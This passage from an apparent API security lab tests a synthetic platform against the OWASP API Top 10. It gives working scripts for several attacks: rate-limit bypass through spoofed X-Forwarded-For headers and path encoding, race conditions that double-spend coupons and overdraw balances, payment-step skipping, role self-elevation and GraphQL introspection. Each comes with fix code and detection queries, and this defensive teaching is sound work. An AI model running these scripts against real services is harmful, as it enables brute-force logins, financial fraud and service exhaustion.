      -H "Authorization: Bearer $TOKEN" 2>/dev/null | grep -i "ratelimit\|retry-after\|x-rate"
    echo ""
done

Expected Output (Synthetic):

--- /v2/me ---
x-ratelimit-limit: 1000
x-ratelimit-remaining: 998
x-ratelimit-reset: 1711939600

--- /v2/projects ---
x-ratelimit-limit: 1000
x-ratelimit-remaining: 997
x-ratelimit-reset: 1711939600

--- /v2/search ---
x-ratelimit-limit: 100
x-ratelimit-remaining: 99
x-ratelimit-reset: 1711936060

--- /v2/auth/login ---
x-ratelimit-limit: 10
x-ratelimit-remaining: 8
x-ratelimit-reset: 1711936060

--- /v2/admin/users ---
x-ratelimit-limit: 1000
x-ratelimit-remaining: 996
x-ratelimit-reset: 1711939600

Rate Limit Configuration Summary

Endpoint Category | Limit (per window) | Keyed By | Scope
General API | 1000/hour | Per token | Global
Search | 100/minute | Per token | Per endpoint
Auth/Login | 10/minute | Per IP | Per endpoint
Admin | 1000/hour | Per token | Global (shared with general)

Bypass Rate Limiting — Header Manipulation

# Test if X-Forwarded-For is trusted for rate limiting
for i in $(seq 1 15); do
    SPOOFED_IP="192.0.2.$((RANDOM % 254 + 1))"
    STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
      -X POST https://api.example.com/v2/auth/login \
      -H "Content-Type: application/json" \
      -H "X-Forwarded-For: $SPOOFED_IP" \
      -d '{"username": "testuser", "password": "REDACTED-WRONG"}')
    echo "Attempt $i (via $SPOOFED_IP): $STATUS"
done

Expected Output (Synthetic):

Attempt 1 (via 192.0.2.142): 401
Attempt 2 (via 192.0.2.87): 401
Attempt 3 (via 192.0.2.203): 401
...
Attempt 14 (via 192.0.2.55): 401
Attempt 15 (via 192.0.2.191): 401

Finding: Rate Limit Bypass via X-Forwarded-For

The login endpoint uses the X-Forwarded-For header for rate limiting instead of the actual client IP. By rotating spoofed IPs, an attacker can perform unlimited authentication attempts, enabling brute-force password attacks. The rate limit of 10/minute/IP is completely bypassable. This is API4:2023 — Unrestricted Resource Consumption.
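
A common mitigation is to honor X-Forwarded-For only when the TCP peer is a known proxy, and then to take the right-most address that is not itself a trusted proxy. The following is a sketch under stated assumptions: `TRUSTED_PROXIES` (set here to the lab's synthetic internal range) and `rate_limit_ip` are hypothetical names, not part of any real gateway.

```python
import ipaddress
from typing import Optional

# Assumption: only load balancers inside the synthetic internal range are trusted
TRUSTED_PROXIES = [ipaddress.ip_network("10.50.0.0/16")]


def _is_trusted_proxy(ip_text: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_PROXIES)


def rate_limit_ip(peer_ip: str, x_forwarded_for: Optional[str]) -> str:
    """Pick the address to key rate limits on."""
    # A direct client can put anything in the header, so ignore it entirely
    if not x_forwarded_for or not _is_trusted_proxy(peer_ip):
        return peer_ip
    hops = [hop.strip() for hop in x_forwarded_for.split(",")]
    # Walk right to left: entries appended by our own proxies are skipped,
    # and the first untrusted entry is the address our proxy actually saw
    for hop in reversed(hops):
        if _is_trusted_proxy(hop):
            continue
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            return peer_ip  # malformed header, fall back to the peer address
        return hop
    return peer_ip
```

With this logic, the spoofed values in the loop above never influence the rate limit key, because the requests arrive directly from the attacker's address.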

Bypass Rate Limiting — API Key vs. Token Rotation

# Test if rate limits are per-authentication-method
# Use API key instead of Bearer token to get separate quota
curl -s -D - -o /dev/null -X POST https://api.example.com/v2/search \
  -H "X-API-Key: REDACTED-API-KEY-EXAMPLE" \
  -H "Content-Type: application/json" \
  -d '{"query": "test"}' 2>/dev/null | grep -i "ratelimit"

# Rate limit headers show separate counter
# x-ratelimit-limit: 100
# x-ratelimit-remaining: 100   ← Full quota, not shared with Bearer token

# Test if rate limits track across API versions
curl -s -I "https://api.example.com/v1/search?q=test" \
  -H "Authorization: Basic $(echo -n 'testuser:1711936000:user:tenant-001' | base64)" \
  2>/dev/null | grep -i "ratelimit"

# Expected: No rate limit headers on v1 API!

Finding: Legacy API Has No Rate Limiting

The v1 API does not implement any rate limiting, allowing unlimited requests. Combined with the weak authentication, this enables unlimited brute-force and data extraction attacks. This is both API4:2023 — Unrestricted Resource Consumption and API9:2023 — Improper Inventory Management.

Bypass Rate Limiting — Unicode and Encoding Tricks

# Test if URL encoding bypasses rate limit tracking
# Normal request
curl -s -o /dev/null -w "%{http_code}" \
  https://api.example.com/v2/search \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"query": "test"}'

# URL-encoded path (may be tracked separately)
curl -s -o /dev/null -w "%{http_code}" \
  "https://api.example.com/v2/%73earch" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"query": "test"}'

# Double-encoded path
curl -s -o /dev/null -w "%{http_code}" \
  "https://api.example.com/v2/%2573earch" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"query": "test"}'

# Case variation
curl -s -o /dev/null -w "%{http_code}" \
  "https://api.example.com/V2/Search" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"query": "test"}'

Expected Output (Synthetic):

200  ← Normal - counted against rate limit
200  ← URL encoded - separate rate limit counter!
200  ← Double encoded - separate rate limit counter!
200  ← Case variation - separate rate limit counter!

Finding: Path Normalization Inconsistency

Rate limiting is applied before URL normalization, so /v2/search, /v2/%73earch, /v2/%2573earch, and /V2/Search are tracked as separate endpoints. An attacker can multiply their effective rate limit by using encoding variations. This is API4:2023 — Unrestricted Resource Consumption.
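
The fix is to derive the rate limit key from a canonical form of the path. The sketch below is one possible canonicalization, with `rate_limit_path_key` as a hypothetical helper name. It assumes the router treats paths case-insensitively, as the /V2/Search result suggests; if routing is case-sensitive, the lowercasing step should be dropped.

```python
import posixpath
from urllib.parse import unquote


def rate_limit_path_key(raw_path: str, max_rounds: int = 5) -> str:
    """Canonicalize a request path so encoding variants share one counter."""
    path = raw_path
    # Decode repeatedly so double-encoded input (%2573 -> %73 -> s) collapses
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Collapse "." and ".." segments and repeated slashes
    path = posixpath.normpath(path)
    # Assumption: routing is case-insensitive, so the key is too
    return path.lower()


variants = ["/v2/search", "/v2/%73earch", "/v2/%2573earch", "/V2/Search"]
keys = {rate_limit_path_key(v) for v in variants}
```

All four variants from the test above map to the single key /v2/search, so they draw from the same quota.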

Step 4.2: Race Condition Exploitation

Race Condition — Coupon Application

# Race condition exploit for coupon double-spending (SYNTHETIC - educational only)
import asyncio
import aiohttp
import json

BASE_URL = "https://api.example.com/v2"
TOKEN = "SYNTHETIC_TOKEN_HERE"
COUPON_CODE = "WELCOME50"  # Single-use 50% discount coupon

async def apply_coupon(session, order_id, attempt_num):
    """Send coupon application request."""
    headers = {
        "Authorization": f"Bearer {TOKEN}",
        "Content-Type": "application/json"
    }
    payload = {
        "coupon_code": COUPON_CODE,
        "order_id": order_id
    }

    try:
        async with session.post(
            f"{BASE_URL}/billing/apply-coupon",
            headers=headers,
            json=payload
        ) as response:
            result = await response.json()
            status = response.status
            return {
                "attempt": attempt_num,
                "status": status,
                "result": result
            }
    except Exception as e:
        return {"attempt": attempt_num, "error": str(e)}

async def race_coupon():
    """Fire concurrent coupon application requests."""
    order_id = "order-5001"
    num_concurrent = 20

    async with aiohttp.ClientSession() as session:
        # Create all tasks
        tasks = [
            apply_coupon(session, order_id, i)
            for i in range(num_concurrent)
        ]

        # Fire all requests simultaneously
        results = await asyncio.gather(*tasks)

        # Analyze results
        successes = [r for r in results if r.get("status") == 200]
        print(f"\n[*] Total requests: {num_concurrent}")
        print(f"[*] Successful applications: {len(successes)}")

        for s in successes:
            discount = s["result"].get("discount_applied", "unknown")
            print(f"    Attempt {s['attempt']}: Discount applied = {discount}")

if __name__ == "__main__":
    asyncio.run(race_coupon())

Expected Output (Synthetic):

[*] Total requests: 20
[*] Successful applications: 7
    Attempt 0: Discount applied = 50%
    Attempt 2: Discount applied = 50%
    Attempt 3: Discount applied = 50%
    Attempt 7: Discount applied = 50%
    Attempt 11: Discount applied = 50%
    Attempt 14: Discount applied = 50%
    Attempt 18: Discount applied = 50%

Finding: Race Condition — Coupon Double-Spend

The single-use coupon WELCOME50 was successfully applied 7 times in a single race condition window. The application checks coupon validity and marks it as used in separate database transactions, creating a TOCTOU (Time of Check to Time of Use) vulnerability. At scale, this enables significant financial loss. This is API6:2023 — Unrestricted Access to Sensitive Business Flows.
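
The check and the update can be collapsed into one atomic statement so there is no window between them. The sketch below uses SQLite purely for illustration (the lab states the primary database is PostgreSQL, where the same conditional UPDATE applies); the `coupons` table and `redeem_coupon` function are hypothetical.

```python
import sqlite3


def redeem_coupon(conn: sqlite3.Connection, code: str, order_id: str) -> bool:
    """Redeem a single-use coupon; True only for the one request that wins."""
    with conn:  # commits on success, rolls back on exception
        cur = conn.execute(
            # The WHERE clause is the validity check, evaluated atomically
            # with the write, so two requests cannot both see "unused"
            "UPDATE coupons SET redeemed_by = ? "
            "WHERE code = ? AND redeemed_by IS NULL",
            (order_id, code),
        )
        return cur.rowcount == 1


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE coupons (code TEXT PRIMARY KEY, redeemed_by TEXT)")
conn.execute("INSERT INTO coupons (code) VALUES ('WELCOME50')")
conn.commit()

# Replay the 20 attempts from the exploit script against the fixed logic
results = [redeem_coupon(conn, "WELCOME50", "order-5001") for _ in range(20)]
```

The attempts here run sequentially for simplicity. The protection does not depend on that: the database applies each conditional UPDATE atomically, so only one can match the unredeemed row.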

Race Condition — Account Balance Manipulation

# Race condition on fund transfers (SYNTHETIC - educational only)
import asyncio
import aiohttp

BASE_URL = "https://api.example.com/v2"
TOKEN = "SYNTHETIC_TOKEN_HERE"

async def transfer_funds(session, amount, attempt_num):
    """Transfer funds from account to a recipient."""
    headers = {
        "Authorization": f"Bearer {TOKEN}",
        "Content-Type": "application/json"
    }
    payload = {
        "from_account": "acc-1001",
        "to_account": "acc-1002",
        "amount": amount,
        "currency": "USD"
    }

    async with session.post(
        f"{BASE_URL}/billing/transfer",
        headers=headers,
        json=payload
    ) as response:
        result = await response.json()
        return {
            "attempt": attempt_num,
            "status": response.status,
            "result": result
        }

async def race_transfer():
    """Race condition on fund transfer — account has $100 balance."""
    # Account balance: $100 (SYNTHETIC)
    # Each transfer attempts $100 — only one should succeed

    async with aiohttp.ClientSession() as session:
        tasks = [
            transfer_funds(session, 100.00, i)
            for i in range(10)
        ]

        results = await asyncio.gather(*tasks)

        successes = [r for r in results if r.get("status") == 200]
        total_transferred = len(successes) * 100

        print(f"[*] Account balance: $100.00")
        print(f"[*] Transfer requests: 10 x $100.00")
        print(f"[*] Successful transfers: {len(successes)}")
        print(f"[*] Total transferred: ${total_transferred:.2f}")

        if len(successes) > 1:
            print(f"[!] RACE CONDITION: ${total_transferred - 100:.2f} overdraft!")

if __name__ == "__main__":
    asyncio.run(race_transfer())

Expected Output (Synthetic):

[*] Account balance: $100.00
[*] Transfer requests: 10 x $100.00
[*] Successful transfers: 3
[*] Total transferred: $300.00
[!] RACE CONDITION: $200.00 overdraft!

Finding: Race Condition — Financial Overdraft

Three concurrent $100 transfers succeeded against a $100 balance, resulting in a $200 overdraft. The API reads the balance, validates sufficiency, and deducts in separate operations without proper locking. This is API6:2023 — Unrestricted Access to Sensitive Business Flows with direct financial impact.
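
A transfer can be made safe by folding the balance check into the debit itself and running debit and credit in one transaction. This is a sketch only, using SQLite and a hypothetical `accounts` table with balances stored in integer cents; the `transfer` function name is also an assumption.

```python
import sqlite3


def transfer(conn: sqlite3.Connection, src: str, dst: str, cents: int) -> bool:
    """Move funds atomically; returns False if the balance is insufficient."""
    if cents <= 0:
        return False
    with conn:  # one transaction: both updates commit or neither does
        debit = conn.execute(
            # Sufficiency check and deduction happen in the same statement
            "UPDATE accounts SET balance_cents = balance_cents - ? "
            "WHERE id = ? AND balance_cents >= ?",
            (cents, src, cents),
        )
        if debit.rowcount != 1:
            return False
        credit = conn.execute(
            "UPDATE accounts SET balance_cents = balance_cents + ? WHERE id = ?",
            (cents, dst),
        )
        if credit.rowcount != 1:
            # Raising inside the with-block rolls the debit back
            raise LookupError("destination account not found")
    return True


conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE accounts (id TEXT PRIMARY KEY, "
    "balance_cents INTEGER NOT NULL CHECK (balance_cents >= 0))"
)
conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                 [("acc-1001", 10000), ("acc-1002", 0)])
conn.commit()

# Ten $100 transfers against a $100 balance, as in the exploit script
outcomes = [transfer(conn, "acc-1001", "acc-1002", 10000) for _ in range(10)]
```

The CHECK constraint is a second line of defense: even if application code regresses, the database refuses to store a negative balance.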

Step 4.3: Business Logic Exploitation

Negative Quantity/Price Manipulation

# Test negative quantity in order creation
curl -s -X POST https://api.example.com/v2/billing/orders \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "items": [
      {"product_id": "prod-001", "quantity": -5, "unit_price": 99.99}
    ],
    "billing_address": "123 Test Street"
  }' | jq .

Expected Output (Synthetic):

{
  "order_id": "order-6001",
  "status": "pending",
  "items": [
    {
      "product_id": "prod-001",
      "quantity": -5,
      "unit_price": 99.99,
      "line_total": -499.95
    }
  ],
  "subtotal": -499.95,
  "tax": 0.00,
  "total": -499.95,
  "note": "Credit will be applied to your account"
}

Finding: Negative Quantity Creates Credits

The API accepts negative quantities, resulting in a negative order total that generates account credits. An attacker could create orders with negative quantities to generate unlimited account credit, then use that credit for legitimate purchases. This is API6:2023 — Unrestricted Access to Sensitive Business Flows.
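
Server-side validation for this case might look like the sketch below. It is an illustration under assumptions: `PRICE_CATALOG`, `MAX_QUANTITY`, and `validate_order_items` are hypothetical, and the catalog price is invented to match the synthetic request. The sketch also ignores the client-supplied unit_price, since letting the client set prices is a related weakness in the same request.

```python
from decimal import Decimal

# Hypothetical server-side catalog; prices never come from the client
PRICE_CATALOG = {"prod-001": Decimal("99.99")}
MAX_QUANTITY = 1000  # assumption: upper bound per line item


def validate_order_items(items):
    """Return priced line items, rejecting invalid products or quantities."""
    validated = []
    for item in items:
        product_id = item.get("product_id")
        quantity = item.get("quantity")
        if product_id not in PRICE_CATALOG:
            raise ValueError(f"unknown product: {product_id!r}")
        # bool is a subclass of int in Python, so exclude it explicitly
        if isinstance(quantity, bool) or not isinstance(quantity, int):
            raise ValueError("quantity must be an integer")
        if not 1 <= quantity <= MAX_QUANTITY:
            raise ValueError("quantity out of range")
        unit_price = PRICE_CATALOG[product_id]
        validated.append({
            "product_id": product_id,
            "quantity": quantity,
            "unit_price": unit_price,
            "line_total": unit_price * quantity,
        })
    return validated
```

Using Decimal rather than float avoids rounding drift in totals.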

Workflow Manipulation — Skip Payment Step

# Normal order workflow: create → payment → confirm → ship
# Test: skip payment step by directly confirming an unpaid order

# Step 1: Create order
ORDER_RESPONSE=$(curl -s -X POST https://api.example.com/v2/billing/orders \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "items": [
      {"product_id": "prod-001", "quantity": 1, "unit_price": 499.99}
    ]
  }')
ORDER_ID=$(echo "$ORDER_RESPONSE" | jq -r '.order_id')
echo "Order created: $ORDER_ID"

# Step 2: Skip payment — directly confirm
curl -s -X POST "https://api.example.com/v2/billing/orders/${ORDER_ID}/confirm" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"confirm": true}' | jq .

Expected Output (Synthetic):

{
  "order_id": "order-6002",
  "status": "confirmed",
  "payment_status": "pending",
  "items": [
    {
      "product_id": "prod-001",
      "quantity": 1,
      "unit_price": 499.99
    }
  ],
  "total": 499.99,
  "confirmed_at": "2026-04-01T11:00:00Z",
  "estimated_shipping": "2026-04-03"
}

Finding: Payment Step Bypass

The order confirmation endpoint does not validate that payment has been received. An order can be confirmed and queued for shipping without any payment. The workflow does not enforce state machine transitions. This is API6:2023 — Unrestricted Access to Sensitive Business Flows.
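
Enforcing the workflow amounts to an explicit transition table that every status change must pass through. The sketch below assumes status names derived from the create, payment, confirm, ship workflow described above; `ALLOWED_TRANSITIONS`, `InvalidTransition`, and `transition` are hypothetical names.

```python
# Assumed order states, based on the create -> payment -> confirm -> ship flow
ALLOWED_TRANSITIONS = {
    "pending": {"paid", "cancelled"},
    "paid": {"confirmed", "cancelled"},
    "confirmed": {"shipped"},
    "shipped": set(),
    "cancelled": set(),
}


class InvalidTransition(Exception):
    """Raised when a status change skips or reverses a workflow step."""


def transition(order: dict, new_status: str) -> dict:
    """Return a copy of order in new_status, or raise if the move is illegal."""
    current = order["status"]
    if new_status not in ALLOWED_TRANSITIONS.get(current, set()):
        raise InvalidTransition(f"{current} -> {new_status} is not allowed")
    return {**order, "status": new_status}
```

In this model the confirm endpoint would call transition(order, "confirmed"), which fails for an order that is still pending. The "paid" status itself should be set only by the payment processor callback, never by a client request.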

Privilege Escalation via Invitation Flow

# Business logic: invite a user to a project with elevated role
# Standard users can invite collaborators with "viewer" role
# Test: invite self with "owner" role

curl -s -X POST "https://api.example.com/v2/projects/proj-1001/collaborators" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "user_id": "user-1001",
    "role": "owner",
    "send_notification": false
  }' | jq .

Expected Output (Synthetic):

{
  "project_id": "proj-1001",
  "collaborator": {
    "user_id": "user-1001",
    "username": "testuser",
    "role": "owner",
    "added_at": "2026-04-01T11:05:00Z"
  },
  "message": "Collaborator role updated successfully"
}

Finding: Self-Elevation via Invitation

A user can invite themselves to a project with the "owner" role, overriding their existing permissions. The API does not restrict the roles that can be assigned through the invitation endpoint. This is a business logic flaw under API5:2023 — Broken Function Level Authorization.
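
A server-side check for role assignment could follow two rules: nobody changes their own role, and nobody grants a role above their own. The sketch below is a hypothetical policy, not NovaPlatform's; the `ROLE_RANK` hierarchy (including the "editor" role) and `can_assign_role` are assumptions made for illustration.

```python
# Hypothetical role hierarchy; "editor" is assumed for illustration
ROLE_RANK = {"viewer": 1, "editor": 2, "owner": 3}


def can_assign_role(actor_id: str, actor_role: str,
                    target_id: str, requested_role: str) -> bool:
    """Decide whether actor may give target the requested project role."""
    if actor_role not in ROLE_RANK or requested_role not in ROLE_RANK:
        return False  # unknown roles are denied by default
    if actor_id == target_id:
        return False  # no self-service role changes
    # The granted role may not outrank the actor's own role
    return ROLE_RANK[requested_role] <= ROLE_RANK[actor_role]
```

The actor's role must be read from the server's own records for the project, never from the request body.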

Step 4.4: Resource Exhaustion

Test Large Payload Processing

# Test maximum request body size
python3 -c "
import json
# Generate a large but valid JSON payload
large_payload = {
    'query': 'A' * 1000000,  # 1MB string
    'type': 'projects',
    'limit': 10
}
print(json.dumps(large_payload))
" | curl -s -X POST https://api.example.com/v2/search \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d @- -w "\nTime: %{time_total}s\nSize: %{size_download} bytes\n"

Expected Output (Synthetic):

{"error": "Search query too long", "max_length": 10000}
Time: 12.456s
Size: 56 bytes

Finding: Slow Response on Large Payloads

While the server eventually rejects the oversized query, it takes 12+ seconds to respond. The server is processing/validating the full 1MB payload before rejecting it. A concurrent flood of large payloads could cause denial of service. This is API4:2023 — Unrestricted Resource Consumption.

Test Pagination Abuse

# Request extremely large page sizes
curl -s "https://api.example.com/v2/projects?page=1&per_page=999999" \
  -H "Authorization: Bearer $TOKEN" \
  -w "\nTime: %{time_total}s\nSize: %{size_download} bytes\n" | tail -3

Expected Output (Synthetic):

Time: 8.234s
Size: 4521890 bytes

Finding: No Maximum Page Size Enforcement

The API accepts a per_page value of 999999 and returns all records (4.5MB response). This enables data exfiltration in a single request and can cause performance degradation. The API should enforce a maximum page size (e.g., 100). This is API4:2023 — Unrestricted Resource Consumption.
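
A minimal sketch of such enforcement follows. `DEFAULT_PER_PAGE`, `MAX_PER_PAGE`, and `parse_pagination` are hypothetical names, and the choice to clamp oversized values rather than reject them is an assumption; either behavior bounds the response size.

```python
from typing import Mapping, Tuple

DEFAULT_PER_PAGE = 25   # assumption
MAX_PER_PAGE = 100      # matches the example maximum suggested above


def parse_pagination(params: Mapping[str, str]) -> Tuple[int, int]:
    """Parse page/per_page query parameters and cap the page size."""
    try:
        page = int(params.get("page", 1))
        per_page = int(params.get("per_page", DEFAULT_PER_PAGE))
    except (TypeError, ValueError):
        raise ValueError("page and per_page must be integers") from None
    if page < 1 or per_page < 1:
        raise ValueError("page and per_page must be positive")
    # Clamp instead of trusting the client-supplied size
    return page, min(per_page, MAX_PER_PAGE)
```

With this in place, the per_page=999999 request above would be served as a 100-record page.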

Test File Upload Resource Exhaustion

# Generate and upload a large file (SYNTHETIC)
dd if=/dev/urandom bs=1M count=500 2>/dev/null | \
  curl -s -X POST https://api.example.com/v2/projects/proj-1001/files \
    -H "Authorization: Bearer $TOKEN" \
    -H "Content-Type: multipart/form-data" \
    -F "file=@-;filename=large_file.bin" \
    -F "description=test upload" \
    -w "\nTime: %{time_total}s\n"

Expected Output (Synthetic):

{
  "file_id": "file-9001",
  "filename": "large_file.bin",
  "size_bytes": 524288000,
  "status": "uploaded",
  "storage_path": "s3://novaplatform-files-staging/tenant-001/proj-1001/file-9001"
}
Time: 45.678s

Finding: No File Size Limit Enforcement

The API accepted a 500MB file upload without restriction. Repeated large uploads could exhaust storage quotas, drive up S3 costs, and saturate bandwidth. This is API4:2023 — Unrestricted Resource Consumption.
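
A size cap is most effective when enforced while the body is streaming, so the server stops reading as soon as the limit is crossed instead of buffering the whole file. The sketch below shows the idea with generic file-like objects; `MAX_UPLOAD_BYTES`, `UploadTooLarge`, and `copy_with_limit` are hypothetical names, and the 100 MB default is an assumption.

```python
import io
from typing import BinaryIO

MAX_UPLOAD_BYTES = 100 * 1024 * 1024  # assumption: 100 MB per upload
CHUNK_SIZE = 64 * 1024


class UploadTooLarge(Exception):
    """Raised as soon as an upload exceeds the configured limit."""


def copy_with_limit(src: BinaryIO, dst: BinaryIO,
                    limit: int = MAX_UPLOAD_BYTES) -> int:
    """Stream src into dst, aborting once more than limit bytes were read."""
    total = 0
    while True:
        chunk = src.read(CHUNK_SIZE)
        if not chunk:
            break
        total += len(chunk)
        if total > limit:
            # Stop before writing the chunk that crosses the limit
            raise UploadTooLarge(f"upload exceeds {limit} bytes")
        dst.write(chunk)
    return total
```

The caller remains responsible for discarding any partial data already written to dst when the exception is raised. A declared Content-Length can be checked first as a cheap early rejection, but it should not replace the streaming check because the header is client-controlled.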

Detection & Defense — Exercise 4

KQL Detection: Rate Limit Bypass Attempts

// Detect X-Forwarded-For rotation for rate limit bypass
ApiAccessLog
| where TimeGenerated > ago(15m)
| where URL has "/auth/login"
| extend ForwardedFor = extract(@"X-Forwarded-For:\s*([^,\r\n]+)", 1, RequestHeaders)
| summarize
    UniqueForwardedIPs = dcount(ForwardedFor),
    RequestCount = count(),
    StatusCodes = make_bag(pack(tostring(StatusCode), 1))
    by ActualClientIP, bin(TimeGenerated, 5m)
| where UniqueForwardedIPs > 3 and RequestCount > 10
| project TimeGenerated, ActualClientIP, UniqueForwardedIPs, RequestCount, StatusCodes

KQL Detection: Race Condition Indicators

// Detect rapid identical requests (race condition attempts)
ApiAccessLog
| where TimeGenerated > ago(5m)
| where Method == "POST"
| where URL has_any ("/billing/", "/transfer", "/coupon", "/confirm")
| summarize
    RequestCount = count(),
    TimeSpread_ms = datetime_diff('millisecond', max(TimeGenerated), min(TimeGenerated)),
    UniquePayloads = dcount(RequestBody)
    by ClientIP, URL, bin(TimeGenerated, 1s)
| where RequestCount > 5 and TimeSpread_ms < 1000
| where UniquePayloads <= 2  // Same or very similar payloads
| project TimeGenerated, ClientIP, URL, RequestCount, TimeSpread_ms

SPL Detection: Business Logic Abuse

index=api_logs sourcetype=api_access method=POST
| search uri_path="/v2/billing/orders" OR uri_path="/v2/billing/apply-coupon"
| rex field=request_body "\"quantity\"\s*:\s*(?<quantity>-?\d+)"
| rex field=request_body "\"total\"\s*:\s*(?<total>-?[\d.]+)"
| eval is_suspicious=if(quantity < 0 OR total < 0, "yes", "no")
| search is_suspicious="yes"
| stats count as abuse_attempts, sum(total) as total_credit_generated by src_ip, user_id
| sort -total_credit_generated

Defensive Recommendations

Securing Rate Limiting and Business Logic

  1. Rate limit by authenticated identity, not IP — use the JWT subject claim or API key as the rate limit key, not headers like X-Forwarded-For
  2. Normalize URLs before rate limiting — decode URL encoding, normalize case, and resolve path traversals before applying rate limits
  3. Enforce maximum page sizes — set and enforce a maximum per_page value (e.g., 100) at the API gateway level
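  4. Implement idempotency keys — require unique idempotency keys for financial operations so that duplicated or replayed requests are applied at most once; keys alone do not serialize distinct concurrent requests, so pair them with the locking in item 5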
  5. Use database-level locks for critical operations — apply SELECT FOR UPDATE or advisory locks on coupon redemption, fund transfers, and other critical state changes
  6. Validate business rules at every step — enforce state machine transitions (e.g., order must be in "paid" status before confirmation)
  7. Validate numeric ranges — reject negative quantities, prices, and amounts at the API input validation layer
  8. Enforce file upload limits — set maximum file sizes per upload and per-tenant storage quotas
  9. Implement request body size limits — reject requests exceeding a reasonable body size (e.g., 10KB for search, 100MB for file uploads) at the API gateway

Cross-Reference

For vulnerability management and remediation tracking for these issues, see Chapter 29: Vulnerability Management.


Exercise 5: GraphQL Security Testing

Objectives

  • Exploit GraphQL introspection to map the entire schema
  • Abuse query depth and complexity to cause denial of service
  • Perform batching attacks to bypass rate limiting and brute-force authentication
  • Exploit field suggestion to enumerate schema details even without introspection
  • Test for authorization bypass in GraphQL resolvers
  • Identify data exposure through GraphQL query flexibility

OWASP API Mapping

Finding Category | OWASP API 2023
Introspection exposure | API8:2023 — Security Misconfiguration
Query depth abuse | API4:2023 — Unrestricted Resource Consumption
Batching attacks | API4:2023 — Unrestricted Resource Consumption
Authorization bypass in resolvers | API1:2023 — Broken Object Level Authorization
Field suggestion exploitation | API8:2023 — Security Misconfiguration

Step 5.1: GraphQL Introspection Attack

Full Schema Introspection

# Send introspection query to retrieve the full GraphQL schema
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "{ __schema { types { name kind description fields { name type { name kind ofType { name kind } } args { name type { name kind } } } } } }"
  }' | jq '.data.__schema.types | map(select(.kind == "OBJECT")) | .[].name'

Expected Output (Synthetic):

"Query"
"Mutation"
"Subscription"
"User"
"UserProfile"
"UserCredentials"
"Project"
"ProjectAnalytics"
"File"
"FileVersion"
"AuditEntry"
"Tenant"
"TenantConfig"
"BillingAccount"
"Invoice"
"Webhook"
"WebhookDelivery"
"SearchResult"
"InternalMetrics"
"DebugInfo"

Finding: Full Introspection Enabled

GraphQL introspection is enabled and returns the complete schema, including sensitive types like UserCredentials, TenantConfig, InternalMetrics, and DebugInfo. This gives attackers a complete map of all queryable data. This is API8:2023 — Security Misconfiguration. Introspection should be disabled in production.
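
Most GraphQL servers offer a setting or validation rule to disable introspection, and that is the preferred control. Where no such option is available, a pre-execution gate can reject queries that select the introspection fields. The sketch below is a deliberately crude, text-based approximation: `uses_introspection` is a hypothetical helper, and a real implementation should inspect the parsed query AST rather than use regular expressions.

```python
import re

# Remove block strings, quoted strings, and comments so that a literal such
# as "__schema" inside an argument value does not trigger a false positive
_STRINGS_AND_COMMENTS = re.compile(
    r'"""[\s\S]*?"""|"(?:\\.|[^"\\\n])*"|#[^\n]*'
)
# Match the __schema and __type meta-fields, but not __typename
_INTROSPECTION_FIELD = re.compile(
    r"(?<![A-Za-z0-9_])__(?:schema|type)(?![A-Za-z0-9_])"
)


def uses_introspection(query: str) -> bool:
    """Heuristically detect schema introspection in a GraphQL document."""
    stripped = _STRINGS_AND_COMMENTS.sub(" ", query)
    return bool(_INTROSPECTION_FIELD.search(stripped))
```

The gate leaves __typename alone because client libraries commonly request it for caching, and it reveals only the type of data the caller could already query.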

Extract Full Schema Detail

# Detailed introspection — get all fields, arguments, and types
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "query IntrospectionQuery { __schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } directives { name description locations args { ...InputValue } } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef } } fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } } }"
  }' | jq . > graphql-schema.json

# Count types and print the name of the root query type
echo "Types: $(jq '.data.__schema.types | length' graphql-schema.json)"
echo "Queries: $(jq '.data.__schema.queryType.name' graphql-schema.json)"

# List all queries
jq -r '.data.__schema.types[] | select(.name == "Query") | .fields[] | "  \(.name)(\(.args | map(.name) | join(", ")))"' graphql-schema.json

Expected Output (Synthetic):

Types: 42
Queries: "Query"

  me()
  user(id)
  users(tenant, role, limit, offset)
  project(id)
  projects(tenant, status, limit, offset)
  projectAnalytics(projectId, startDate, endDate)
  file(id)
  files(projectId, type, limit, offset)
  search(query, type, limit)
  auditLog(tenant, startDate, endDate, limit)
  tenant(id)
  tenants(limit, offset)
  billingAccount(userId)
  invoices(userId, status, limit)
  webhooks(projectId)
  internalMetrics(service)
  debugInfo()

List All Mutations

jq -r '.data.__schema.types[] | select(.name == "Mutation") | .fields[] | "  \(.name)(\(.args | map(.name) | join(", ")))"' graphql-schema.json

Expected Output (Synthetic):

  createUser(input)
  updateUser(id, input)
  deleteUser(id)
